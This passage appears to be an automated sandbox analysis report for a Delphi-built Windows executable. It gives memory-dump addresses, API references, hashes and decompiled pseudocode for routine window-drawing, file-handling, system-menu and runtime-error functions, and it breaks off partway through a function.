0x00442d47
0x00442d8d
0x00442d91
0x00442d9f
0x00442da1
0x00442da8
0x00442db4
0x00442dbc
0x00442dbe
0x00442dbe
0x00442dd1
0x00442de5
0x00442ded
0x00442df1
0x00442df6
0x00442df7
0x00442dfc
0x00442dfe
0x00442e00
0x00442e02
0x00442e04
0x00442e06
0x00442e08
0x00442e17
0x00442e1b
0x00442e23
0x00442e24
0x00442e40
0x00442e52
0x00442e5d
0x00442e69
0x00442e71
0x00442e79
0x00442e7e
0x00442e83
0x00442e85
0x00442e8a
0x00442e8e
0x00442e92
0x00442e97
0x00442e9b
0x00442e9b
0x00442e9c
0x00442e9d
0x00442e9e
0x00442eab
0x00442eb7
0x00442ebf
0x00442ec7
0x00442ecc
0x00442ed1
0x00442ed3
0x00442ed8
0x00442edc
0x00442ee0
0x00442ee4
0x00442ee5
0x00442ee8
0x00442ee9
0x00442eea
0x00000000
0x00442eea
0x00442d4c
0x00442d55
0x00442d58
0x00442d62
0x00442d63
0x00442d65
0x00442d6a
0x00442d6e
0x00442d76
0x00442d7a
0x00442d7d
0x00442d82
0x00442d83
0x00000000
0x00442d83
0x00442ef5

APIs

73452430.COMCTL32(00000000,?,00000000,?,?,00000000,00000000,00000000,00000000,?), ref: 00442D83
73452430.COMCTL32(00000000,?,00000000,00000000,00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00442E24
SetTextColor.GDI32(00000000,00FFFFFF), ref: 00442E71
SetBkColor.GDI32(00000000,00000000), ref: 00442E79
72E897E0.GDI32(00000000,?,?,?,?,00000000,00000000,00000000,00E20746,00000000,00000000,00000000,00FFFFFF,00000000,?,00000000), ref: 00442E9E

Part of subcall function 00442CFC: 73452240.COMCTL32(00000000,?,00442D5D,00000000,?), ref: 00442D12

Strings

A, xrefs: 00442D95

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: 73452430Color$73452240E897Text
String ID: A
API String ID: 3108427945-2078354741
Opcode ID: 0f851143a4723c1e469f68ae85ed01e11b98bc9687f63f75ec430250f1b258e2
Instruction ID: d0fefe29b67275db9c7b77aa62528a76afe2b693edbbb3a5430c448e5f2d0cae
Opcode Fuzzy Hash: 0f851143a4723c1e469f68ae85ed01e11b98bc9687f63f75ec430250f1b258e2
Instruction Fuzzy Hash: E4510971700114ABDB40FF69DD82F9E37ECAF48318F50016AF905EB286CA78EC418B69

Uniqueness

Uniqueness Score: -1.00%

Function 0043A0A0, Relevance: 15.2, APIs: 10, Instructions: 177
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0043A0A0(void* __eax, void* __ecx, struct HDC__* __edx) {
				struct tagRECT _v44;
				struct tagRECT _v60;
				void* _v68;
				int _v80;
				int _t79;
				void* _t134;
				int _t135;
				void* _t136;
				void* _t159;
				void* _t160;
				void* _t161;
				struct HDC__* _t162;
				intOrPtr* _t163;

				_t163 =  &(_v44.bottom);
				_t134 = __ecx;
				_t162 = __edx;
				_t161 = __eax;
				if( *((char*)(__eax + 0x1a8)) != 0 &&  *((char*)(__eax + 0x1a7)) != 0 &&  *((intOrPtr*)(__eax + 0x17c)) != 0) {
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x17c)))) + 0x20))();
				}
				_t78 =  *((intOrPtr*)(_t161 + 0x198));
				if( *((intOrPtr*)(_t161 + 0x198)) == 0) {
					L17:
					_t79 =  *(_t161 + 0x19c);
					if(_t79 == 0) {
						L27:
						return _t79;
					}
					_t79 =  *((intOrPtr*)(_t79 + 8)) - 1;
					if(_t79 < 0) {
						goto L27;
					}
					_v44.right = _t79 + 1;
					_t159 = 0;
					do {
						_t79 = E004141BC( *(_t161 + 0x19c), _t159);
						_t135 = _t79;
						if( *((char*)(_t135 + 0x1a5)) != 0 && ( *(_t135 + 0x50) & 0x00000010) != 0 && ( *((char*)(_t135 + 0x57)) != 0 || ( *(_t135 + 0x1c) & 0x00000010) != 0 && ( *(_t135 + 0x51) & 0x00000004) == 0)) {
							_v44.left = CreateSolidBrush(E0041EF40(0x80000010));
							E00412B80( *((intOrPtr*)(_t135 + 0x40)) +  *((intOrPtr*)(_t135 + 0x48)),  *((intOrPtr*)(_t135 + 0x44)) - 1,  &(_v44.right),  *((intOrPtr*)(_t135 + 0x44)) +  *((intOrPtr*)(_t135 + 0x4c)));
							FrameRect(_t162,  &_v44, _v44);
							DeleteObject(_v60.right);
							_v60.left = CreateSolidBrush(E0041EF40(0x80000014));
							E00412B80( *((intOrPtr*)(_t135 + 0x40)) +  *((intOrPtr*)(_t135 + 0x48)) + 1,  *((intOrPtr*)(_t135 + 0x44)),  &(_v60.right),  *((intOrPtr*)(_t135 + 0x44)) +  *((intOrPtr*)(_t135 + 0x4c)) + 1);
							FrameRect(_t162,  &_v60, _v60);
							_t79 = DeleteObject(_v68);
						}
						_t159 = _t159 + 1;
						_t75 =  &(_v44.right);
						 *_t75 = _v44.right - 1;
					} while ( *_t75 != 0);
					goto L27;
				}
				_t160 = 0;
				if(_t134 != 0) {
					_t160 = E00414218(_t78, _t134);
					if(_t160 < 0) {
						_t160 = 0;
					}
				}
				 *_t163 =  *((intOrPtr*)( *((intOrPtr*)(_t161 + 0x198)) + 8));
				if(_t160 <  *_t163) {
					do {
						_t136 = E004141BC( *((intOrPtr*)(_t161 + 0x198)), _t160);
						if( *((char*)(_t136 + 0x57)) != 0 || ( *(_t136 + 0x1c) & 0x00000010) != 0 && ( *(_t136 + 0x51) & 0x00000004) == 0) {
							E00412B80( *((intOrPtr*)(_t136 + 0x40)) +  *(_t136 + 0x48),  *((intOrPtr*)(_t136 + 0x44)),  &(_v44.bottom),  *((intOrPtr*)(_t136 + 0x44)) +  *(_t136 + 0x4c));
							if(RectVisible(_t162,  &(_v44.top)) != 0) {
								if(( *(_t161 + 0x54) & 0x00000080) != 0) {
									 *(_t136 + 0x54) =  *(_t136 + 0x54) | 0x00000080;
								}
								_v60.top = SaveDC(_t162);
								E004344B0(_t162,  *((intOrPtr*)(_t136 + 0x44)),  *((intOrPtr*)(_t136 + 0x40)));
								IntersectClipRect(_t162, 0, 0,  *(_t136 + 0x48),  *(_t136 + 0x4c));
								E00436D28(_t136, _t162, 0xf, 0);
								RestoreDC(_t162, _v80);
								 *(_t136 + 0x54) =  *(_t136 + 0x54) & 0x0000ff7f;
							}
						}
						_t160 = _t160 + 1;
					} while (_t160 < _v60.top);
				}
			}

0x0043a0a4
0x0043a0a7
0x0043a0a9
0x0043a0ab
0x0043a0b4
0x0043a0d2
0x0043a0d2
0x0043a0d5
0x0043a0dd
0x0043a1c2
0x0043a1c2
0x0043a1ca
0x0043a2cf
0x0043a2cf
0x0043a2cf
0x0043a1d3
0x0043a1d6
0x00000000
0x00000000
0x0043a1dd
0x0043a1e1
0x0043a1e3
0x0043a1eb
0x0043a1f0
0x0043a1f9
0x0043a233
0x0043a256
0x0043a261
0x0043a26b
0x0043a280
0x0043a2a3
0x0043a2ae
0x0043a2b8
0x0043a2b8
0x0043a2bd
0x0043a2be
0x0043a2be
0x0043a2be
0x00000000
0x0043a1e3
0x0043a0e3
0x0043a0e7
0x0043a0f0
0x0043a0f4
0x0043a0f6
0x0043a0f6
0x0043a0f4
0x0043a101
0x0043a107
0x0043a10d
0x0043a11a
0x0043a120
0x0043a14e
0x0043a160
0x0043a166
0x0043a168
0x0043a168
0x0043a174
0x0043a180
0x0043a192
0x0043a1a2
0x0043a1ad
0x0043a1b2
0x0043a1b2
0x0043a160
0x0043a1b8
0x0043a1b9
0x0043a10d

APIs

RectVisible.GDI32(?,?), ref: 0043A159
SaveDC.GDI32(?), ref: 0043A16F
IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 0043A192
RestoreDC.GDI32(?,?), ref: 0043A1AD
CreateSolidBrush.GDI32(00000000), ref: 0043A22E
FrameRect.USER32 ref: 0043A261
DeleteObject.GDI32(?), ref: 0043A26B
CreateSolidBrush.GDI32(00000000), ref: 0043A27B
FrameRect.USER32 ref: 0043A2AE
DeleteObject.GDI32(?), ref: 0043A2B8

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
String ID:
API String ID: 375863564-0
Opcode ID: c4276c5b968bbb51ecb1191cd3375441d771cedfcd47410ac2e995f0bbf811e7
Instruction ID: d7f80e08fa115caa7cc628a2e98c7148b3d638a8714db69d2232ae688719de5f
Opcode Fuzzy Hash: c4276c5b968bbb51ecb1191cd3375441d771cedfcd47410ac2e995f0bbf811e7
Instruction Fuzzy Hash: C55170712042409BDB18DF69C8C4B5B77E8AF48308F04449EED89CB396D739EC54CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00402B40, Relevance: 15.1, APIs: 10, Instructions: 129
fileCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00402B40(void** __eax) {
				long _t29;
				void* _t31;
				long _t34;
				void* _t38;
				void* _t40;
				long _t41;
				int _t44;
				void* _t46;
				long _t54;
				long _t55;
				void* _t58;
				void** _t59;
				DWORD* _t60;

				_t59 = __eax;
				 *((intOrPtr*)(__eax + 0xc)) = 0;
				 *((intOrPtr*)(__eax + 0x10)) = 0;
				if(0xffffffffffff284f == 0) {
					_t29 = 0x80000000;
					_t55 = 1;
					_t54 = 3;
					 *((intOrPtr*)(__eax + 0x1c)) = 0x402a94;
				} else {
					if(0xffffffffffff284f == 0) {
						_t29 = 0x40000000;
						_t55 = 1;
						_t54 = 2;
					} else {
						if(0xffffffffffff284f != 0) {
							return 0xffffffffffff284d;
						}
						_t29 = 0xc0000000;
						_t55 = 1;
						_t54 = 3;
					}
					_t59[7] = E00402AD4;
				}
				_t59[9] = E00402B20;
				_t59[8] = E00402AD0;
				if(_t59[0x12] == 0) {
					_t59[2] = 0x80;
					_t59[9] = E00402AD0;
					_t59[5] =  &(_t59[0x53]);
					if(_t59[1] == 0xd7b2) {
						if(_t59 != 0x4923e4) {
							_push(0xfffffff5);
						} else {
							_push(0xfffffff4);
						}
					} else {
						_push(0xfffffff6);
					}
					_t31 = GetStdHandle();
					if(_t31 == 0xffffffff) {
						goto L37;
					}
					 *_t59 = _t31;
					goto L30;
				} else {
					_t38 = CreateFileA( &(_t59[0x12]), _t29, _t55, 0, _t54, 0x80, 0);
					if(_t38 == 0xffffffff) {
						L37:
						_t59[1] = 0xd7b0;
						return GetLastError();
					}
					 *_t59 = _t38;
					if(_t59[1] != 0xd7b3) {
						L30:
						if(_t59[1] == 0xd7b1) {
							L34:
							return 0;
						}
						_t34 = GetFileType( *_t59);
						if(_t34 == 0) {
							CloseHandle( *_t59);
							_t59[1] = 0xd7b0;
							return 0x69;
						}
						if(_t34 == 2) {
							_t59[8] = E00402AD4;
						}
						goto L34;
					}
					_t59[1] = _t59[1] - 1;
					_t40 = GetFileSize( *_t59, 0) + 1;
					if(_t40 == 0) {
						goto L37;
					}
					_t41 = _t40 - 0x81;
					if(_t41 < 0) {
						_t41 = 0;
					}
					if(SetFilePointer( *_t59, _t41, 0, 0) + 1 == 0) {
						goto L37;
					} else {
						_t44 = ReadFile( *_t59,  &(_t59[0x53]), 0x80, _t60, 0);
						_t58 = 0;
						if(_t44 != 1) {
							goto L37;
						}
						_t46 = 0;
						while(_t46 < _t58) {
							if( *((char*)(_t59 + _t46 + 0x14c)) == 0xe) {
								if(SetFilePointer( *_t59, _t46 - _t58, 0, 2) + 1 == 0 || SetEndOfFile( *_t59) != 1) {
									goto L37;
								} else {
									goto L30;
								}
							}
							_t46 = _t46 + 1;
						}
						goto L30;
					}
				}
			}

0x00402b41
0x00402b45
0x00402b48
0x00402b54
0x00402b61
0x00402b66
0x00402b6b
0x00402b70
0x00402b56
0x00402b57
0x00402b79
0x00402b7e
0x00402b83
0x00402b59
0x00402b5a
0x00000000
0x00000000
0x00402b8a
0x00402b8f
0x00402b94
0x00402b94
0x00402b99
0x00402b99
0x00402ba0
0x00402ba7
0x00402bb2
0x00402c70
0x00402c77
0x00402c7e
0x00402c87
0x00402c93
0x00402c99
0x00402c95
0x00402c95
0x00402c95
0x00402c89
0x00402c89
0x00402c89
0x00402c9b
0x00402ca3
0x00000000
0x00000000
0x00402ca5
0x00000000
0x00402bb8
0x00402bc8
0x00402bd0
0x00402cde
0x00402cde
0x00000000
0x00402ce4
0x00402bd6
0x00402bde
0x00402ca7
0x00402cad
0x00402cc6
0x00000000
0x00402cc6
0x00402cb1
0x00402cb8
0x00402ccc
0x00402cd1
0x00000000
0x00402cd7
0x00402cbd
0x00402cbf
0x00402cbf
0x00000000
0x00402cbd
0x00402be4
0x00402bf1
0x00402bf2
0x00000000
0x00000000
0x00402bf8
0x00402bfd
0x00402bff
0x00402bff
0x00402c0e
0x00000000
0x00402c14
0x00402c29
0x00402c2e
0x00402c30
0x00000000
0x00000000
0x00402c36
0x00402c38
0x00402c44
0x00402c58
0x00000000
0x00402c68
0x00000000
0x00402c68
0x00402c58
0x00402c46
0x00402c46
0x00000000
0x00402c38
0x00402c0e

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402BC8
GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402BEC
SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402C08
ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000), ref: 00402C29
SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00402C52
SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00402C60
GetStdHandle.KERNEL32(000000F5), ref: 00402C9B
GetFileType.KERNEL32(?,000000F5), ref: 00402CB1
CloseHandle.KERNEL32(?,?,000000F5), ref: 00402CCC
GetLastError.KERNEL32(000000F5), ref: 00402CE4

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
String ID:
API String ID: 1694776339-0
Opcode ID: dcb8e97b696e6bc76657cc7b0d214e8e532fd6263ed9e43d8f9e30d2fac3868e
Instruction ID: a6438adf2f580a4a1c5e5da74ce647d5313ec81f7875eed0d703bfc6362872ce
Opcode Fuzzy Hash: dcb8e97b696e6bc76657cc7b0d214e8e532fd6263ed9e43d8f9e30d2fac3868e
Instruction Fuzzy Hash: 6B418270108700AAF7309F248B0D72B76A5EB00754F248E3FE096BA6E0D6FDA885975D

Uniqueness

Uniqueness Score: -1.00%

Function 00450F50, Relevance: 15.1, APIs: 10, Instructions: 74
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00450F50(intOrPtr _a4) {
				intOrPtr _t27;
				struct HMENU__* _t48;

				_t27 =  *((intOrPtr*)(_a4 - 4));
				if( *((char*)(_t27 + 0x229)) != 0) {
					_t27 =  *((intOrPtr*)(_a4 - 4));
					if(( *(_t27 + 0x228) & 0x00000001) != 0) {
						_t27 =  *((intOrPtr*)(_a4 - 4));
						if( *((char*)(_t27 + 0x22f)) != 1) {
							_t48 = GetSystemMenu(E0043C1F4( *((intOrPtr*)(_a4 - 4))), 0);
							if( *((char*)( *((intOrPtr*)(_a4 - 4)) + 0x229)) == 3) {
								DeleteMenu(_t48, 0xf130, 0);
								DeleteMenu(_t48, 7, 0x400);
								DeleteMenu(_t48, 5, 0x400);
								DeleteMenu(_t48, 0xf030, 0);
								DeleteMenu(_t48, 0xf020, 0);
								DeleteMenu(_t48, 0xf000, 0);
								return DeleteMenu(_t48, 0xf120, 0);
							}
							if(( *( *((intOrPtr*)(_a4 - 4)) + 0x228) & 0x00000002) == 0) {
								EnableMenuItem(_t48, 0xf020, 1);
							}
							_t27 =  *((intOrPtr*)(_a4 - 4));
							if(( *(_t27 + 0x228) & 0x00000004) == 0) {
								return EnableMenuItem(_t48, 0xf030, 1);
							}
						}
					}
				}
				return _t27;
			}

0x00450f57
0x00450f61
0x00450f6a
0x00450f74
0x00450f7d
0x00450f87
0x00450fa0
0x00450faf
0x00450fb9
0x00450fc6
0x00450fd3
0x00450fe0
0x00450fed
0x00450ffa
0x00000000
0x00451007
0x0045101b
0x00451025
0x00451025
0x0045102d
0x00451037
0x00000000
0x00451041
0x00451037
0x00450f87
0x00450f74
0x00451048

APIs

GetSystemMenu.USER32(00000000,00000000), ref: 00450F9B
DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00450FB9
DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00450FC6
DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00450FD3
DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00450FE0
DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 00450FED
DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 00450FFA
DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 00451007
EnableMenuItem.USER32 ref: 00451025
EnableMenuItem.USER32 ref: 00451041

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$Delete$EnableItem$System
String ID:
API String ID: 3985193851-0
Opcode ID: a2d595ded8ba6b339cc18aed0c59235ccb821512961eadbe81d816e5afdcf518
Instruction ID: af257f66785166594afa963312794baf518a67384d1452903d84868792595f0b
Opcode Fuzzy Hash: a2d595ded8ba6b339cc18aed0c59235ccb821512961eadbe81d816e5afdcf518
Instruction Fuzzy Hash: 92214970380340BAE720AB24CDCEF597AD95F08B19F0540A5BA097F6E3C6BCF991861C

Uniqueness

Uniqueness Score: -1.00%

Function 0040A0A4, Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 50
filewindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A0A4(void* __edi) {
				void _v1024;
				char _v1088;
				long _v1092;
				void* _t10;
				char* _t12;
				intOrPtr _t14;
				intOrPtr _t16;
				intOrPtr _t22;
				long _t26;
				void* _t34;

				E00409F1C(_t10,  &_v1024, _t34, 0x400);
				_t12 =  *0x491180; // 0x492048
				if( *_t12 == 0) {
					_t14 =  *0x490f5c; // 0x407578
					_t7 = _t14 + 4; // 0xffe8
					_t16 =  *0x492714; // 0x400000
					LoadStringA(E00405AAC(_t16),  *_t7,  &_v1088, 0x40);
					return MessageBoxA(0,  &_v1024,  &_v1088, 0x2010);
				}
				_t22 =  *0x490fa8; // 0x492218
				E00402D34(_t22);
				_t26 = E00408BD4( &_v1024, __edi);
				WriteFile(GetStdHandle(0xfffffff5),  &_v1024, _t26,  &_v1092, 0);
				return WriteFile(GetStdHandle(0xfffffff5), 0x40a154, 2,  &_v1092, 0);
			}

0x0040a0b3
0x0040a0b8
0x0040a0c0
0x0040a113
0x0040a118
0x0040a11c
0x0040a127
0x00000000
0x0040a13d
0x0040a0c2
0x0040a0c7
0x0040a0d7
0x0040a0ea
0x00000000

APIs

Part of subcall function 00409F1C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00409F39
Part of subcall function 00409F1C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00409F5D
Part of subcall function 00409F1C: GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00409F78
Part of subcall function 00409F1C: LoadStringA.USER32 ref: 0040A00E

GetStdHandle.KERNEL32(000000F5,?,00000000,?,00000000), ref: 0040A0E4
WriteFile.KERNEL32(00000000,000000F5,?,00000000,?,00000000), ref: 0040A0EA
GetStdHandle.KERNEL32(000000F5,0040A154,00000002,?,00000000,00000000,000000F5,?,00000000,?,00000000), ref: 0040A0FF
WriteFile.KERNEL32(00000000,000000F5,0040A154,00000002,?,00000000,00000000,000000F5,?,00000000,?,00000000), ref: 0040A105
LoadStringA.USER32 ref: 0040A127
MessageBoxA.USER32 ref: 0040A13D

Strings

H I, xrefs: 0040A0B8
xu@, xrefs: 0040A113

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: File$HandleLoadModuleNameStringWrite$MessageQueryVirtual
String ID: H I$xu@
API String ID: 1802973324-3923842764
Opcode ID: 32cabdcad2e6483aa5f0624397b5106cba7b9691167058358ceafcaa585a4e96
Instruction ID: 13a967ae5c580ad2ac90e8131e6b9058e14945a2df50c8333751adfe9f430824
Opcode Fuzzy Hash: 32cabdcad2e6483aa5f0624397b5106cba7b9691167058358ceafcaa585a4e96
Instruction Fuzzy Hash: 3E011EB11043007EE200E7A5CC42F9B77AC9B45718F40463BB755F71E2DA7899548B6A

Uniqueness

Uniqueness Score: -1.00%

Function 004041CC, Relevance: 14.0, APIs: 5, Strings: 3, Instructions: 38
filewindowCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E004041CC(void* __ecx) {
				char _v4;
				int _t3;

				if( *0x492048 == 0) {
					if( *0x47601c == 0) {
						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
					}
					return _t3;
				} else {
					if( *0x49221c == 0xd7b2 &&  *0x492224 > 0) {
						 *0x492234();
					}
					_t1 =  &_v4; // 0x475a64
					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e, _t1, 0);
					_t2 =  &_v4; // 0x475a64
					return WriteFile(GetStdHandle(0xfffffff5), E00404254, 2, _t2, 0);
				}
			}

0x004041d4
0x00404234
0x00404244
0x00404244
0x0040424a
0x004041d6
0x004041df
0x004041ef
0x004041ef
0x004041f7
0x0040420b
0x00404212
0x0040422c
0x0040422c

APIs

GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,dZG,00000000,?,0040429A,?,?,?,00000001,0040433A,00402863,004028AB,?,00000000), ref: 00404205
WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,dZG,00000000,?,0040429A,?,?,?,00000001,0040433A,00402863,004028AB), ref: 0040420B
GetStdHandle.KERNEL32(000000F5,00404254,00000002,dZG,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,dZG,00000000,?,0040429A), ref: 00404220
WriteFile.KERNEL32(00000000,000000F5,00404254,00000002,dZG,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,dZG,00000000,?,0040429A), ref: 00404226
MessageBoxA.USER32 ref: 00404244

Strings

dZG, xrefs: 004041F7, 00404212, 004041FB, 00404216
Runtime error at 00000000, xrefs: 004041FE, 0040423D
Error, xrefs: 00404238

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: FileHandleWrite$Message
String ID: Error$Runtime error at 00000000$dZG
API String ID: 1570097196-1623845894
Opcode ID: d2ffed7f8d98215c6a07db0e1ae2cbfceb1bae4e681e6e904f6eddb52037b241
Instruction ID: 56a2d7f83fb72e5fdd31d13c6850d10172e2c0d40c461f73bd65f5ba21560b84
Opcode Fuzzy Hash: d2ffed7f8d98215c6a07db0e1ae2cbfceb1bae4e681e6e904f6eddb52037b241
Instruction Fuzzy Hash: 18F0BBA068038075FA20B3645E07F9A225D4791F19F6086FFB314B40E386FC44CC976E

Uniqueness

Uniqueness Score: -1.00%

Function 0042CEC8, Relevance: 13.7, APIs: 9, Instructions: 172
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0042CEC8(intOrPtr* __eax, void* __ecx) {
				intOrPtr _v8;
				struct tagRECT _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				void* __edi;
				void* __ebp;
				void* _t85;
				intOrPtr* _t150;
				void* _t152;
				void* _t158;
				intOrPtr _t165;
				void* _t181;
				signed int _t183;
				void* _t186;
				void* _t188;
				void* _t190;
				intOrPtr _t191;

				_t152 = __ecx;
				_t188 = _t190;
				_t191 = _t190 + 0xffffffdc;
				_push(_t181);
				_t150 = __eax;
				_t85 = E0043A424(__eax, _t158);
				_t193 =  *((char*)(_t150 + 0x165));
				if( *((char*)(_t150 + 0x165)) == 0) {
					return _t85;
				} else {
					_v8 = E0041FD3C(_t152, 1);
					 *[fs:eax] = _t191;
					E00434750(_v8, _t150);
					 *((intOrPtr*)( *_t150 + 0x44))( *[fs:eax], 0x42d0f1, _t188);
					E0041FBEC( *((intOrPtr*)(_v8 + 0x14)),  *_t150,  *((intOrPtr*)(_t150 + 0x70)), _t181, _t188, _t193);
					E004202C0(_v8,  &_v24);
					InflateRect( &_v24, 0xffffffff, 0xffffffff);
					E004202C0(_v8,  &_v24);
					if( *((char*)(_t150 + 0x165)) != 0) {
						_t186 = 0;
						if( *((char*)(_t150 + 0x163)) != 0) {
							_t186 = 0 +  *((intOrPtr*)(_t150 + 0x168));
						}
						if( *((char*)(_t150 + 0x164)) != 0) {
							_t186 = _t186 +  *((intOrPtr*)(_t150 + 0x168));
						}
						_t199 = _t186;
						if(_t186 == 0) {
							 *((intOrPtr*)( *_t150 + 0x44))();
							E0041FBEC( *((intOrPtr*)(_v8 + 0x14)),  *_t150,  *((intOrPtr*)(_t150 + 0x70)), _t181, _t188, _t199);
							E004202C0(_v8,  &_v24);
							InflateRect( &_v24, 0xffffffff, 0xffffffff);
							E004202C0(_v8,  &_v24);
						}
						 *((intOrPtr*)( *_t150 + 0x44))();
						E00435514(_t150,  &_v40);
						_t183 = GetWindowLongA(E00420704(_v8), 0xfffffff0);
						if(( *(_t150 + 0x162) & 0x00000001) != 0) {
							_v40 = _v40 - _t186;
						}
						if(( *(_t150 + 0x162) & 0x00000002) != 0) {
							_v36 = _v36 - _t186;
						}
						if(( *(_t150 + 0x162) & 0x00000004) != 0) {
							_v32 = _v32 + _t186;
						}
						if((_t183 & 0x00200000) != 0) {
							_v32 = _v32 + GetSystemMetrics(0x14);
						}
						if(( *(_t150 + 0x162) & 0x00000008) != 0) {
							_v28 = _v28 + _t186;
						}
						if((_t183 & 0x00100000) != 0) {
							_v28 = _v28 + GetSystemMetrics(0x15);
						}
						DrawEdge(E00420704(_v8),  &_v24,  *0x00476834 |  *0x00476844,  *0x00476854 |  *0x00476864 | 0x00002000);
						_v24.left = _v24.right - GetSystemMetrics(0xa) - 1;
						if(E0042B758(_t150) == 0) {
